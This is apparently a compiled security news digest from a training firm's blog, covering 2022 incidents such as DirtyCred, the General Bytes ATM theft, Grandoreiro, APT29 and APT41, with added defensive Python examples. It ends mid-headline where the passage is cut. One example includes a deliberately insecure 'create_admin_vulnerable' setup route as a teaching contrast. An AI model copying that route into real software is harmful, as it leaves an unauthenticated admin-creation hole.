Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Ancient Linux Vuln Allows Privilege Escalation
An eight-year-old memory management vulnerability in the Linux kernel could allow privilege escalation, say three researchers from Northwestern University. Their DirtyCred proof-of-concept exploit swaps an unprivileged task's credential object in kernel memory for a privileged one (for example, the credentials of a SetUID process), abusing the way the kernel reuses freed heap memory rather than overwriting any particular kernel data structure - which is what makes it a generic technique rather than a one-off bug.
Lakshmanan, Ravie, "As Nasty as Dirty Pipe" - 8 Year Old Linux Kernel Vulnerability Uncovered, The Hacker News, 22 August 2022. Available online at https://thehackernews.com/2022/08/as-nasty-as-dirty-pipe-8-year-old-linux.html.
Healthcare Info of Almost 1.4 M Patients Exposed Via Ad Tracker
A US healthcare provider, Novant Health, has revealed that the sensitive information of 1,362,296 patients was accidentally disclosed when an advertising performance tracker script was misconfigured. The company added the Meta Pixel (formerly Facebook Pixel) JavaScript ad-tracking script to a May 2020 promotional campaign for COVID-19 vaccinations which made use of Facebook advertisements.
However, the tracker was misconfigured both on the Novant Health site and on the 'MyChart' portal, which allows patients to book appointments, request prescription refills and use other services with 64 US healthcare providers. The misconfiguration sent a long list of sensitive data, including email address, phone number, and appointment type and date, to Facebook/Meta and its advertising partners.
Novant discovered the issue in May 2022 and has contacted all the people affected. However, they also say that attempts to get Meta to delete the data were met with no response.
Toulas, Bill, Misconfigured Meta Pixel exposed healthcare data of 1.3M patients, Bleeping Computer, 22 August 2022. Available online at https://www.bleepingcomputer.com/news/security/misconfigured-meta-pixel-exposed-healthcare-data-of-13m-patients/.
Bitcoin Stolen from General Bytes ATMs
Unknown hackers have been able to exploit an embarrassingly simple vulnerability in the Crypto Application Server that controls General Bytes Bitcoin ATMs, and thereby steal cryptocurrencies from the ATM customers. The hack was achieved simply by calling an admin URL that is intended to be used only during initial installation of the server, when it creates the first admin user. By calling this API and creating an admin user called 'gb', the attackers were then able to modify the 'buy', 'sell' and 'invalid payment address' settings to point at a crypto wallet that they controlled.
From that point on, any cryptocurrencies received by the ATM went to the hackers, rather than the intended destination.
The moral of the story? Review any installation scripts and setup endpoints, and remove or disable them once installation has been completed. Allow admin access only from trusted subnets. And, of course, patch proactively.
Abrams, Lawrence, Hackers steal crypto from Bitcoin ATMs by exploiting zero-day bug, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-steal-crypto-from-bitcoin-atms-by-exploiting-zero-day-bug/.
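To make the moral concrete, here is an added example (ours, not General Bytes' code, and not a reconstruction of their server) of a first-run "create the initial administrator" handler written the weak way and the hardened way. The state object, function names, trusted subnets and status codes are all assumptions for the illustration; the three controls are the ones the paragraph above lists: the route dies once an admin exists, it only answers to operator networks, and it demands a one-time token minted by the installer.

```python
import hmac
import ipaddress
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed example: operator networks from which the install-time API may be
# called. These ranges are an assumption for the illustration.
TRUSTED_ADMIN_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.0/24"),
]


@dataclass
class ServerState:
    """Minimal stand-in for the server's persistent state (hypothetical)."""
    admins: Dict[str, str] = field(default_factory=dict)  # username -> role
    setup_token: Optional[str] = None  # one-time secret shown at install time
    setup_complete: bool = False


def new_install() -> ServerState:
    """First run: mint a one-time setup token the installer must present."""
    state = ServerState()
    state.setup_token = secrets.token_urlsafe(32)
    return state


def create_admin_vulnerable(state: ServerState, username: str) -> int:
    """The anti-pattern: the install-time route keeps working forever, for
    anyone who can reach it. Returns an HTTP-style status code."""
    state.admins[username] = "admin"
    return 201


def create_admin_hardened(state: ServerState, username: str,
                          source_ip: str, token: Optional[str]) -> int:
    """Same route with the three controls the story calls for."""
    # 1. Once an administrator exists the route must be dead; answer as if it
    #    had never existed so scanners learn nothing from it.
    if state.setup_complete or state.admins:
        return 404
    # 2. Only operator networks may reach administrative setup.
    ip = ipaddress.ip_address(source_ip)
    if not any(ip in net for net in TRUSTED_ADMIN_NETS):
        return 403
    # 3. The caller must prove it ran the installer by presenting the
    #    one-time token (constant-time compare to avoid timing leaks).
    if state.setup_token is None or not hmac.compare_digest(token or "", state.setup_token):
        return 401
    state.admins[username] = "admin"
    state.setup_token = None      # single use
    state.setup_complete = True
    return 201
```

The order of the checks matters: the "already installed" test comes first so that, in the normal case of a long-deployed server, a request to the setup URL from anywhere gets a 404 and reveals nothing about whether a token or a trusted subnet would have helped.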
LatentBot Mutates Into Grandoreiro
LatentBot is a trojan that dates back to 2013; written in Delphi, it has a modular design that allows it to download additional modules for keystroke logging, cookie stealing and remote access. Since June 2022, a campaign using a derivative called Grandoreiro has been targeting companies in Spanish-speaking countries with official-looking emails apparently from government agencies.
The victims are directed to download and share a document, but the link actually redirects to a malicious domain and then downloads a ZIP file containing the Grandoreiro loader. The loader performs a series of anti-analysis checks: walking the list of currently executing processes looking for malware analysis tools, checking whether it is being run from a particular directory, looking for debuggers, and reading from the I/O port that VMware exposes to guest machines in order to detect a virtual environment.
If all of these pass, it gathers some basic system information, checks for the presence of crypto wallets (which it will investigate later) and then fetches the main payload. This uses even more anti-analysis tricks - for example, it embeds two tightly-compressed bitmap images which, when expanded, inflate the resulting binary to over 400 MB, exceeding the file size limit of most analysis sandboxes.
From there on, Grandoreiro communicates with its C2 network in exactly the same way as LatentBot, and can download any of a huge selection of backdoor capabilities.
Shivtarkar, Niraj, Grandoreiro Banking Trojan with New TTPs Targeting Various Industry Verticals, Zscaler ThreatLabz blog, 18 August 2022. Available online at https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals.
More Info on Mēris
Google has released a little more information about last week's massive DDoS attack, attributed to the Mēris botnet. There were 5,256 source IP addresses from 132 countries engaged in the attack, approximately 22% of them Tor exit nodes (although these accounted for only 3% of the traffic). As previously mentioned, the use of HTTPS meant the connections had to be terminated in order to inspect the traffic; however, because the attackers used HTTP pipelining, which sends multiple requests over a single connection, relatively few TLS handshakes were needed to absorb the attack.
Google Cloud Armor's 'Adaptive Protection' feature was apparently able to identify the attack quickly, alert the customer and recommend a protective rule - in this case, rate-limiting the connections, which would still allow legitimate traffic through.
Kiner, Emil and Satya Konduru, How Google Cloud blocked the largest Layer 7 DDoS attack at 46 million rps, Google Cloud blog, 19 August 2022. Available online at https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps.
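As an added illustration of the kind of rule recommended above (this is our own code, not Google Cloud Armor's implementation, and the traffic is constructed), the following sliding-window limiter keys on the source address and lets a client browsing at a normal rate through while a source that floods within the window is cut off at the budget. The threshold, window and addresses are assumptions for the example.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple


class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window_s` seconds for each key."""

    def __init__(self, limit: int, window_s: float):
        self.limit = limit
        self.window = window_s
        self.hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        # drop timestamps that have fallen out of the window
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False          # over budget: answer 429 or drop
        q.append(now)
        return True


def apply_limit(requests: List[Tuple[float, str]], limit: int,
                window_s: float) -> Dict[str, Tuple[int, int]]:
    """Run a (timestamp, source) stream through the limiter and return
    per-source counts of (passed, blocked)."""
    limiter = SlidingWindowLimiter(limit, window_s)
    counts: Dict[str, List[int]] = defaultdict(lambda: [0, 0])
    for ts, src in sorted(requests):
        counts[src][0 if limiter.allow(src, ts) else 1] += 1
    return {src: (p, b) for src, (p, b) in counts.items()}


# Constructed traffic: one client browsing at 1 request/s, and one flooding
# source sending 50 requests inside half a second (documentation address
# ranges, not real hosts).
LEGIT = "198.51.100.10"
FLOOD = "192.0.2.1"
SAMPLE = [(float(i), LEGIT) for i in range(10)] + \
         [(0.5 + i * 0.01, FLOOD) for i in range(50)]


def demo() -> Dict[str, Tuple[int, int]]:
    """Budget of 10 requests per second per source."""
    return apply_limit(SAMPLE, limit=10, window_s=1.0)
```

Keying on the source IP alone is the simplest rule, and it has a cost: with 22% of the attack sources being Tor exit nodes, a per-IP bucket also throttles every legitimate Tor user behind the same exit. Production rules combine keys (address, session, geography) and the threshold has to come from a baseline of what normal per-client rates look like, which is what the 'Adaptive Protection' feature is doing for the customer.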
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
News Stories
Chip Makers Take On PQCrypto
We have written here before about the need for cryptographic agility - the ability to replace those public-key crypto algorithms that are expected to fall, sooner or later, to quantum cryptanalysis. That's a challenge, because most of the quantum-resistant algorithms are compute-intensive and use larger keys and signatures, but desktop, laptop and cloud server machines should be able to cope without too much difficulty.
However, the same is not true for the small, low-powered system-on-a-chip devices that power the Internet of Things, and especially for the smart cards used as credit cards, access badges and so on, which will require specialised hardware to perform acceptably. In the first part of an interview, Joppe W. Bos, senior principal cryptographer at NXP Semiconductors and a co-creator of the CRYSTALS-Kyber algorithm recently selected by NIST for standardization, explains some of the challenges.
Valerio, Pablo, Post-Quantum Cryptography needs to be ready to protect IoT, IoT Times, 17 August 2022. Available online at https://iot.eetimes.com/post-quantum-cryptography-needs-to-be-ready-to-protect-iot/.
Intel Adds CPU Circuitry to Defeat Power-On Attacks
Processors that incorporate a Trusted Platform Module have an obscure weakness: an attacker with physical access manipulates the voltage supplied to the CPU at just the right moment, as it is loading the firmware for its security engine. By triggering an error condition at that instant - a fault-injection, or voltage glitching, attack - the attacker could get the security engine to load malicious firmware, which would then give them access to data, such as biometric templates, stored in the TPM.
Now Intel is adding a tunable replica circuit to the company's 12th generation (Alder Lake) Core processors. It monitors the timing of circuits on the chip against a tunable reference and, if a voltage or clock glitch pushes them out of the expected range, generates an error and a fail-safe reset. The circuit is being added to these laptop processors first because the attack - which remains theoretical at this stage - requires physical access to the motherboard, something that is easier to obtain with a laptop than with server and desktop machines.
Shah, Agam, Intel Adds New Circuits to Chips to Ward Off Motherboard Exploits, Dark Reading, 20 August 2022. Available online at https://www.darkreading.com/dr-tech/intel-adds-new-circuit-to-chips-to-ward-off-motherboard-exploits.
Fake Cloudflare DDoS Protection Pages Trick Users Into Installing Trojans
Occasionally, when visiting a busy web site, you will see a Cloudflare DDoS protection page that holds you up for a few seconds, as a way of rate-limiting bots which are attempting to overwhelm the site with bogus requests. In a new social engineering twist, hackers are using weakly protected WordPress sites to host an obfuscated JavaScript payload that displays a fake Cloudflare DDoS page - but then asks the visitor to click on a button to bypass the delay. This downloads a container file called 'security_install.iso', which the victim is told installs a program called DDOS GUARD that will get them faster access.
In fact, this is the first step in a chain of Windows PowerShell scripts which culminates in installing the NetSupport remote access trojan and the Raccoon Stealer information stealer on the victim's system.
Defensive techniques include hardening WordPress sites, and educating users never to install programs that pop-up messages prompt them to download - a genuine DDoS check never asks you to download anything.
Toulas, Bill, WordPress sites hacked with fake Cloudflare DDoS alerts pushing malware, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/wordpress-sites-hacked-with-fake-cloudflare-ddos-alerts-pushing-malware/.
Gimme Cookie! Want Cookie!
A timely reminder that web session security ultimately depends on cookies, which are vulnerable to a variety of theft techniques. Although authenticating to a web site might involve multi-factor authentication, once that has been done, everything depends on the session cookie. And because those cookies can be quite long-lived - who wants to log in to a web site every few minutes? - markets are emerging where stolen cookies are sold. Low-end cybercriminals can operate malware like Raccoon Stealer and RedLine Stealer, but may not have the sophistication to make use of the sessions they acquire - so they sell them on.
Once issued by a server, cookies are stored by the browser, usually in SQLite databases which may also hold saved user IDs and passwords. A variety of techniques can be used by an attacker to extract the cookies, which can then be used to take over Microsoft 365 and Google Workspace sessions, among others.
Perhaps it's time for us to accept the inconvenience of having to re-authenticate more frequently in order to minimise the window in which a stolen cookie is useful?
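The trade-off above need not be all or nothing. The following is an added example (our own design, not code from Sophos or from any of the services named) of a server-side session table where the cookie carries only an opaque identifier: sessions die after an idle period and after an absolute lifetime, sensitive actions demand a fresh MFA step, and a cookie replayed from a different client fingerprint kills the session outright. The timeouts, the action names and the idea of a `client_fp` string captured at login are assumptions for the illustration; the clock is injectable so the behaviour can be walked through deterministically.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict

# Assumed policy values for the illustration (seconds).
IDLE_TIMEOUT = 15 * 60        # log out after 15 minutes without activity
ABSOLUTE_TIMEOUT = 8 * 3600   # and after 8 hours no matter what
STEP_UP_WINDOW = 5 * 60       # sensitive actions need MFA within the last 5 minutes
SENSITIVE_ACTIONS = {"change_password", "register_mfa_device", "export_mailbox"}


@dataclass
class Session:
    user: str
    created: float
    last_seen: float
    last_mfa: float      # 0.0 if MFA has never been completed in this session
    client_fp: str       # hash of client properties captured at login (assumed)


class SessionStore:
    """Server-side session table; the cookie carries only the opaque sid."""

    def __init__(self, clock):
        self.clock = clock          # injectable clock so behaviour is testable
        self.sessions: Dict[str, Session] = {}

    def login(self, user: str, client_fp: str, mfa_done: bool) -> str:
        now = self.clock()
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = Session(user, now, now, now if mfa_done else 0.0, client_fp)
        return sid

    def record_mfa(self, sid: str) -> None:
        self.sessions[sid].last_mfa = self.clock()

    def authorize(self, sid: str, client_fp: str, action: str) -> str:
        """Returns 'ok', 'reauth' (session expired), 'stepup' (fresh MFA
        needed for this action) or 'denied' (unknown or suspected stolen)."""
        s = self.sessions.get(sid)
        if s is None:
            return "denied"
        now = self.clock()
        if now - s.created > ABSOLUTE_TIMEOUT or now - s.last_seen > IDLE_TIMEOUT:
            del self.sessions[sid]
            return "reauth"
        if not hmac.compare_digest(s.client_fp, client_fp):
            # Same cookie, different client: the classic replay of a stolen
            # cookie. Kill the session rather than just refusing the request.
            del self.sessions[sid]
            return "denied"
        if action in SENSITIVE_ACTIONS and now - s.last_mfa > STEP_UP_WINDOW:
            return "stepup"
        s.last_seen = now
        return "ok"


class FakeClock:
    """Deterministic clock for the walkthrough."""

    def __init__(self, t: float):
        self.t = t

    def __call__(self) -> float:
        return self.t

    def advance(self, seconds: float) -> None:
        self.t += seconds
```

The point of the step-up check is that the user keeps a long, convenient session for reading, but a thief holding the cookie cannot change the password or register a new MFA device without the second factor they do not have; the fingerprint check catches the case where the thief replays the cookie from their own machine.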
Gallagher, Sean, Cookie stealing: the new perimeter bypass, Sophos X-Ops, 18 August 2022. Available online at https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass/.
Attribution Insights from IBM X-Force Research
A fascinating deep dive into malware analysis from IBM X-Force Research shows how the Bumblebee malware, which first appeared last year, was probably developed from the source code of the Ramnit banking trojan. What is interesting about this - apart from the malware coding techniques uncovered - is that Bumblebee has been linked to offshoots of the Conti ransomware group, which fragmented following a series of high-profile leaks of chat messages and the doxxing of some group members.
This suggests that the various spinoffs from Conti are forming new alliances and acquiring new TTPs, possibly heralding completely new attacks. The report makes fascinating reading for those who enjoy reverse-engineering malware.
Hammond, Charlotte and Ole Villadsen, From Ramnit to Bumblebee (via NeverQuest): Similarities and Code Overlap Shed Light on Relationships Between Malware Developers, IBM Security Intelligence, 18 August 2022. Available online at https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest/.
Online Scammers Often Victims Themselves
While we are all familiar with tech support scammers operating out of Mumbai, it seems that a new breed of financial scammers has arisen, operating out of Laos, Myanmar and Cambodia under the control of Taiwanese and Chinese scam bosses. In Cambodia, for example, giant casinos built to lure Chinese gamblers found themselves near-empty due to COVID travel restrictions and were re-purposed as scam operations, staffed by migrant workers lured by fraudulent job ads or even abducted off the street, and who are now held against their will in slave conditions.
The trafficked workers are forced to work from 8 am to 11 pm each day, and are threatened or beaten if they do not raise enough money from their victims; trying to leave is dangerous, with some being killed and others recaptured. The gang bosses are well connected, both politically and to local police, who are notoriously lax in investigating or even side with the bosses. This is a timely reminder that cybercrime isn't just about bits of information and purely financial gain, but sometimes crosses over into people trafficking, slavery and worse.
Kennedy, Lindsey and Nathan Paul Southern, The online scammer targeting you could be trapped in a South-East Asian fraud factory, The Sydney Morning Herald, 21 August 2022. Available online at https://www.smh.com.au/world/asia/the-online-scammer-targeting-you-could-be-trapped-in-a-south-east-asian-fraud-factory-20220818-p5baz3.html.
News Stories
New Variant of Jaca Malware Is Highly Configurable
An updated variant of the Jaca malware toolkit includes new components which form a long chain of actions to infect a victim's system, according to security consultancy Morphisec. The Windows toolkit has been used extensively by a South Asian threat actor called DoNot Team or APT-C-35, and they keep improving it.
The latest variant uses RTF (Rich Text Format) documents that trick the user into enabling macros. A macro then injects shellcode into memory, which downloads a second-stage loader from a C2 server. That in turn downloads a DLL from another C2 server; the DLL sends system information back to its operators, establishes persistence via a Scheduled Task and finally downloads the real payload, which uses loadable modules to selectively exfiltrate data such as keystrokes, screenshots, files and browser data.
This modularity gives DoNot Team considerable flexibility in adapting their malware, which they use to attack defence, diplomatic, government and military organizations in India, Pakistan, Sri Lanka and Bangladesh.
Cohen, Hido and Arnold Osipov, APT-C-35 Gets a New Upgrade, Morphisec Breach Prevention Blog, 11 August 2022. Available online at https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed.
Cryptominers Spread Via Python Repositories
Software developer and researcher Hauke Lübbers 'stumbled across' - and security firm Sonatype has confirmed - a threat actor who has published at least 241 malicious packages to npm (the Node Package Manager registry) and PyPI (the Python Package Index). The packages all bear names similar to those of popular open source projects like React and argparse, but actually download and install the XMRig cryptominer to mine Monero. All the packages were published by an account called '17b4a931'.
However, you would have to wonder about the abilities of a developer who would mistake 'r2act' for 'React'.
Sharma, Ax, More than 200 cryptomining packages flood npm and PyPI registry, Sonatype, 19 August 2022. Available online at https://blog.sonatype.com/more-than-200-cryptominers-flood-npm-and-pypi-registry.
Threat Actor Targets Hospitality and Travel
A small threat actor tracked as TA558 is operating in Latin America, North America and Western Europe, targeting hospitality, travel and related industries. The group uses malmails written in Portuguese, Spanish and sometimes English, enquiring about reservations - something recipients in those industries cannot afford to ignore. However, the attachment is one of over 15 different malware payloads the group uses - mostly remote access trojans that can be used for reconnaissance, information exfiltration and the dropping of more advanced payloads.
The group has been active since at least 2018, but has ramped up its efforts in 2022, perhaps because post-COVID recovery in travel offers it increased opportunities. It has also switched TTPs, from Word macros (now disabled by default) to malware such as Loda RAT, Revenge RAT and others, hosted at URLs or enclosed in container formats such as RAR and ISO files.
Wise, Joe, et al., Reservations Requested: TA558 Targets Hospitality and Travel, Proofpoint blog, 18 August 2022. Available online at https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel.
Cozy Bear Targets Foreign Policy Info in Microsoft 365
Russian state-backed APT29, aka Cozy Bear, has been busy this year, with new advanced TTPs which it uses to compromise Microsoft 365 accounts. In one case the attackers brute-forced the passwords of dormant accounts that had never signed in. Because Azure Active Directory lets a user self-enrol for MFA at their first sign-in, the attackers enrolled their own devices for MFA on those accounts and were then free to use them inside the tenant.
To evade detection, the hackers also disabled the 'Purview Audit' feature (the advanced-audit licence) on targeted mailboxes, which switches off the logging of email accesses. They also ran their operations from Azure VMs, making their activities hard to distinguish from the regular traffic within Azure networks - it all comes from Microsoft IP addresses.
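Both tricks leave a trail that is easy to hunt for if you know to look. The following is an added example (our own detection logic, not Mandiant's, run over constructed events in a simplified schema rather than real Azure AD sign-in and audit logs) that flags an account whose very first successful sign-in came more than thirty days after it was created, from outside the corporate networks, and was followed within minutes by an MFA device registration; it also lists any account whose advanced-audit licence was removed. The field names, thresholds and corporate address range are assumptions.

```python
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List

# Assumed: networks from which first-time logins are expected (office or VPN
# egress). Addresses are documentation ranges.
CORP_NETS = [ipaddress.ip_network("203.0.113.0/24")]
DORMANT_AFTER = timedelta(days=30)        # never signed in for 30+ days
ENROL_WINDOW = timedelta(minutes=30)      # MFA registered soon after first login


def _t(e: Dict) -> datetime:
    return datetime.fromisoformat(e["time"])


def find_dormant_takeovers(events: List[Dict]) -> List[Dict]:
    """Flag accounts whose first successful sign-in came long after creation,
    from outside corporate networks, and was followed within minutes by an
    MFA device registration."""
    by_user: Dict[str, List[Dict]] = {}
    for e in sorted(events, key=_t):
        by_user.setdefault(e["user"], []).append(e)

    findings = []
    for user, evs in by_user.items():
        created = next((_t(e) for e in evs if e["event"] == "AccountCreated"), None)
        signins = [e for e in evs if e["event"] == "SignIn" and e["result"] == "success"]
        if created is None or not signins:
            continue
        first = signins[0]
        if _t(first) - created < DORMANT_AFTER:
            continue                                   # used normally
        if any(ipaddress.ip_address(first["ip"]) in n for n in CORP_NETS):
            continue                                   # expected location
        for e in evs:
            delta = _t(e) - _t(first)
            if e["event"] == "MfaRegistered" and timedelta(0) <= delta <= ENROL_WINDOW:
                findings.append({"user": user, "first_signin": first["time"],
                                 "ip": first["ip"], "mfa_registered": e["time"]})
                break
    return findings


def find_audit_disabled(events: List[Dict]) -> List[str]:
    """Removal of the advanced-audit licence is worth an alert on its own."""
    return sorted({e["user"] for e in events if e["event"] == "AuditLicenseRemoved"})


# Constructed events (simplified schema; real Azure AD logs carry many more fields).
SAMPLE_EVENTS = [
    {"time": "2022-01-10T09:00:00", "user": "alice@example.com", "event": "AccountCreated"},
    {"time": "2022-01-11T08:30:00", "user": "alice@example.com", "event": "SignIn", "result": "success", "ip": "203.0.113.20"},
    {"time": "2022-01-11T08:33:00", "user": "alice@example.com", "event": "MfaRegistered"},
    {"time": "2022-01-10T09:00:00", "user": "svc-archive@example.com", "event": "AccountCreated"},
    {"time": "2022-07-05T02:14:00", "user": "svc-archive@example.com", "event": "SignIn", "result": "failure", "ip": "198.51.100.7"},
    {"time": "2022-07-05T02:15:00", "user": "svc-archive@example.com", "event": "SignIn", "result": "success", "ip": "198.51.100.7"},
    {"time": "2022-07-05T02:19:00", "user": "svc-archive@example.com", "event": "MfaRegistered"},
    {"time": "2022-07-05T02:40:00", "user": "svc-archive@example.com", "event": "AuditLicenseRemoved"},
    {"time": "2022-01-10T09:00:00", "user": "bob@example.com", "event": "AccountCreated"},
    {"time": "2022-07-05T10:00:00", "user": "bob@example.com", "event": "SignIn", "result": "success", "ip": "198.51.100.9"},
]
```

In the sample, the new starter who signs in the day after provisioning from the office and registers MFA is not flagged, the long-dormant service account that is brute-forced overnight from an outside address and immediately enrolled is, and the account that merely signs in late without an enrolment is left for a lower-severity review. The better fix is preventive: require a Temporary Access Pass or an admin-driven enrolment for MFA registration, so that a first sign-in from an unknown device cannot self-enrol at all.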
Bienstock, Douglas, You Can't Audit Me: APT29 Continues Targeting Microsoft 365, Mandiant blog, 18 August 2022. Available online at https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft.
JWST Runs JavaScript. JavaScript?
While we all marvel at the stunning images being sent from the James Webb Space Telescope, it's interesting to reflect on the fact that the scripts that control the imaging instruments are actually written in JavaScript - actually a variant called Nombas ScriptEase 5.00e which was last updated in January 2003.
This really should not come as a big surprise - the JWST has been in development since 1989 and when construction started in 2004, Nombas ScriptEase 5.00e would have been less than two years old. It's not unusual for government and major scientific projects to use quite old and stable technology - NASA has in the past been known to search second-hand component markets for parts like 8086 processors, while other parts of government were still using VAXen long after the rest of the world had moved on.
Clark, Mitchell, The James Webb Space Telescope runs JavaScript, apparently, The Verge, 18 August 2022. Available online at https://www.theverge.com/2022/8/18/23206110/james-webb-space-telescope-javascript-jwst-instrument-control.
News Stories
New Record HTTPS DDoS Attack
A massive DDoS attack over HTTPS was directed at one of Google's Cloud Armor DDoS-protection customers in early June. The 69-minute attack started by sending 10,000 requests per second (rps) to the customer's load balancer, but within ten minutes it had risen to a peak of 46 million rps - equivalent to receiving all of Wikipedia's daily requests within 10 seconds.
The attack seems to have been delivered by the Mēris botnet, although this is more than twice the rate it has previously achieved. Mēris delivers its traffic through unsecured proxies, and because the attack used HTTPS, both the botnet and the victim had to spend a lot of compute power on TLS key exchanges.
Ilascu, Ionut, Google blocks largest HTTPS DDoS attack 'reported to date', Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/google-blocks-largest-https-ddos-attack-reported-to-date/.
Prisoner Details Leaked by Misdirected Email
The Western Australian Department of Justice has had to apologise after sensitive details - full names, an image, date of birth and information about partners - of two prisoners were accidentally sent to the wrong distribution list.
The error occurred when an employee was trying to organize approval for an inter-prison phone call between family members, but picked the wrong list.
This kind of error happens frequently - one memorable case occurred when an employee of a major retail chain sent out a large spreadsheet containing details of gift cards to everyone who had purchased one of the gift cards. Unsurprisingly, a few of the recipients, having obtained details of so many tokens, took the opportunity to use them. If ever there was an argument for the use of groupware or - better still - automated workflows for approval processes, this is it.
Fiore, Briana, Department of Justice apologises over leak of 'sensitive' WA prisoner details, ABC News, 18 August 2022. Available online at https://www.abc.net.au/news/2022-08-18/department-of-justice-wa-apology-prisoner-information-leak/101346460.
Apple Releases Safari 15.6.1 to Fix Zero-Day Exploit
A buffer overflow vulnerability in WebKit, the core of Apple's Safari browser, has been exploited in the wild, leading the company to release an update for the browser. Like other memory corruption bugs, this one could be used to crash the browser, corrupt data or even achieve remote code execution.
Abrams, Lawrence, Apple releases Safari 15.6.1 to fix zero-day bug used in attacks, Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/apple-releases-safari-1561-to-fix-zero-day-bug-used-in-attacks/.
Deep Analysis of APT41, Winnti/Wicked Spider
Singapore-based security firm Group-IB has released a detailed report on the activities of the Chinese state-backed threat actor APT41, also known as Winnti or Wicked Spider. During 2021, APT41 was very busy, hitting a total of 80 different private and public sector organizations and using novel techniques to deploy its customized Cobalt Strike toolkit, perhaps to evade detection: the main binary was Base64-encoded, broken up into chunks of 775 or 1,024 characters, and written chunk by chunk to a text file on the compromised server via SQL injection commands before being reassembled and decoded.
Using this technique, the attackers only succeeded about half the time, suggesting they are more interested in the quantity of victims than their quality. APT41 may well be a coalition of smaller groups, as it uses a wide variety of tools after initial compromise and mixes cyber-espionage with financially-motivated cybercrime.
Rostovtsev, Nikita, APT41 World Tour 2021 on a tight schedule, Group-IB, 18 August 2022. Available online at https://blog.group-ib.com/apt41-world-tour-2021.
Janet Jackson Awarded CVE-2022-38392 for 'Rhythm Nation'
An interesting twist on attacks that cross air gaps: playing the Janet Jackson music video Rhythm Nation on one laptop could cause a nearby laptop to crash, as well as the first computer. The problem, discovered by a computer manufacturer in the Windows XP era, was found - after some serious research - to be due to the audio containing one of the natural resonant frequencies of the 5400 RPM disk drives used by that, and other, laptop manufacturers; it was fixed by adding a custom filter to remove that part of the audio spectrum before it reached the speakers.
Urban myth? Perhaps, but nonetheless MITRE has assigned it CVE-2022-38392.
Chen, Raymond, Janet Jackson had the power to crash laptop computers, Microsoft 'The Old New Thing' blog, 16 August 2022. Available online at https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994.
News Stories
Google Wins One, Loses One
Last year, the Australian Competition and Consumer Commission (ACCC) found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting they needed to change in order to stop the search giant collecting personal location data was the 'Location History' setting. In fact, another Google account setting, 'Web & App Activity', which was turned on by default, also needed to be turned off.
Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the conduct predates the November 2018 increase in the maximum penalty for breaches of Australian consumer law to the greater of $10 million, three times the benefit obtained from the conduct or, if that benefit cannot be determined, 10% of annual turnover.
On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and, by refusing to take down a link, was liable for defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the contents of that article to a third party".
ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.
Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.
Secure Boot Loader Causes More Problems
We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.
Last week's patch, KB5012170, added the signatures of the vendors' vulnerable boot loaders to the Secure Boot Forbidden Signature Database (DBX), which holds the UEFI revocation list. However, systems which do not have a valid, updated boot loader will generate a 0x800f0922 error and fail to install the patch - fortunate for the user, as such a system would not boot if the patch were applied.
Other users are reporting that after the patch is applied, Windows 11 PCs are booting to a BitLocker recovery screen - not a problem if the user has the recovery key, but unfortunately they almost never do. In well-managed environments, a domain administrator can recover the key from Active Directory Domain Services.
Windows 10 users are reporting other problems - slow boot times, or their storage controller mode being changed from RAID to AHCI in the firmware settings, triggering a Blue Screen of Death.
Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.
Millions of Realtek-based Network Devices Vulnerable
